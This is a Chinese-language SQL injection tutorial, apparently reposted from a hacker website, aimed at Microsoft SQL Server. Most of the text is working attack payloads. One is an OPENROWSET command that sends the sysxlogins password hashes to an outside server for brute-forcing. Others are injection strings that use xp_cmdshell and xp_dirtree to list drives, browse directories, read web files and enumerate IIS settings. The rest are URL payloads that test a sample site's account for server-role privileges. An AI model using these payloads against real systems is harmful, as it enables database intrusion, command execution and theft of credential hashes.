這實際上是上述復制數據庫的一個擴展應用。登錄密碼的hash存儲于sysxlogins中。方法如下： insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', ...

這實際上是上述復制數據庫的一個擴展應用。登錄密碼的hash存儲于sysxlogins中。方法如下：

?

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins

?

　　得到hash之后，就可以進行暴力破解。這需要一點運氣和大量時間。

?

　　遍歷目錄的方法：

?

　　先創建一個臨時表：temp

?

'5;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

?

5';insert temp exec master.dbo.xp_availablemedia;-- 獲得當前所有驅動器

?

5';insert into temp(id) exec master.dbo.xp_subdirs 'c:/';-- 獲得子目錄列表

?

5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';-- 獲得所有子目錄的目錄樹結構,并寸入temp表中

?

5';insert into temp(id) exec master.dbo.xp_cmdshell 'type c:/web/index.asp';-- 查看某個文件的內容

?

5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/';--

?

5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/ *.asp /s/a';--

?

5';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:/Inetpub/AdminScripts/adsutil.vbs enum w3svc'

?

5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';-- （xp_dirtree適用權限PUBLIC）

?

寫入表：

?

語句1：_blank>http://www.xxxxx.com/down/list.asp?id=1　and　1=(select IS_SRVROLEMEMBER('sysadmin'));--

?

語句2：_blank>http://www.xxxxx.com/down/list.asp?id=1　and　1=(select IS_SRVROLEMEMBER('serveradmin'));--

?

語句3：_blank>http://www.xxxxx.com/down/list.asp?id=1　and　1=(select IS_SRVROLEMEMBER('setupadmin'));--

?

語句4：_blank>http://www.xxxxx.com/down/list.asp?id=1　and　1=(select IS_SRVROLEMEMBER('securityadmin'));--

?

語句5：_blank>http://www.xxxxx.com/down/list.asp?id=1　and　1=(select IS_SRVROLEMEMBER('securityadmin'));--

?

語句6：_blank>http://www.xxxxx.com/down/list.asp?id=1　and　1=(select IS_SRVROLEMEMBER('diskadmin'));--

?

語句7：_blank>http://www.xxxxx.com/down/list.asp?id=1　and　1=(select IS_SRVROLEMEMBER('bulkadmin'));--

?

語句8：_blank>http://www.xxxxx.com/down/list.asp?id=1　and　1=(select IS_SRVROLEMEMBER('bulkadmin'));--

?

語句9：_blank>http://www.xxxxx.com/down/list.asp?id=1　and　1=(select IS_MEMBER('db_owner'));--

?

把路徑寫到表中去：

?

_blank>http://www.xxxxx.com/down/list.asp?id=1;create　table　dirs(paths varchar(100), id int)-

?

_blank>http://http://www.xxxxx.com/down/list.asp?id=1;insert 　dirs　exec　master.dbo.xp_dirtree 'c:/'-

?

_blank>http://http://www.xxxxx.com/down/list.asp?id=1　and　0<>(select　top　1　paths　from　dirs)-

?

_blank>http://http://www.xxxxx.com/down/list.asp?id=1　and　0<>(select　top　1　paths　from　dirs　where　paths　not　in('@Inetpub'))-

?

語句：_blank>http://http://www.xxxxx.com/down/list.asp?id=1;create　table　dirs1(paths　varchar(100),　id　int)--

?

語句：_blank>http://http://www.xxxxx.com/down/list.asp?id=1;insert　dirs　exec　master.dbo.xp_dirtree 'e:/web'--

?

語句：_blank>http://http://www.xxxxx.com/down/list.asp?id=1　and　0<>(select　top　1　paths　from　dirs1)-

?

?

本篇文章來源于 黑客基地-全球最大的中文黑客站 原文鏈接：http://www.hackbase.com/tech/2009-04-17/52294.html

與50位技術專家面對面20年技術見證，附贈技術全景圖

總結

以上是生活随笔為你收集整理的SQL旁注精华珍藏版代码的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。